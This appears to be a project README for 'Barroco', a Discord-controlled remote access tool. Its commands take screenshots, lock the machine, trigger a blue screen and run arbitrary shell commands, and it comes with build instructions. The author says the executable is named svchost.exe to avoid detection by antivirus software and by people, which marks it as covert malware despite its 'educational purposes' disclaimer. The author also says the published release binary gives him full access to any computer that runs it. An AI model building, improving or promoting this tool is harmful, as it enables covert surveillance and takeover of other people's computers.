Barroco is a discord bot that is used to control a remote computer. It is a python script that is used to control a remote computer.
Control multiple devices with single discord account and directly in discord.
| Command | Description |
|---|---|
help |
Show this help message |
ss |
Capture and send a screenshot of the screen |
ping |
Check bot responsiveness |
lock |
Lock the workstation |
beep |
Play a beep sound |
admincheck |
Check if the current user has administrator privileges |
bsod |
Trigger a Blue Screen of Death (BSOD) |
cmd <command> |
Execute a shell command and return the output [EXPERIMENTAL] |
sysinfo |
Display system information details |
Warning
To run a command, you need to be in the same channel as the target device selected and you need to use the prefix of the target device + the command like qft!sysinfo
Warning
You need to have Python3 installed in your machine.
Important
You need to set the BOT_TOKEN environment variable before compiling.
export BOT_TOKEN="your_token"or in windows cmd
set BOT_TOKEN="your_token"- Compile the bot
make buildor in windows cmd
build.batand then you will get the svchost.exe in the dist folder.
We named it svchost.exe to avoid getting detected by antivirus software and people.
Just run and be happy :)
To avoid future problems, I am NOT responsible for any damage caused by this bot, only the user who runs this bot is responsible for any damage caused by this bot, this project is for educational purposes only.
Warning
Do not use this bot for malicious purposes, it is illegal and unethical.
Important
Don't run the svchost.exe file that I provide on release tab in this github repo, the svchost.exe that I put on the release tab is linked with my personal bot and I use the releases tab to update my bot automatically, so please, don't use, if you will, you will gave me full access to your computer and I'm not responsible for anything that happens to your computer.
- Auto-Updater Local
- Auto-Updater via Github
- Add file manager (upload, download, list, delete, create folders, etc.)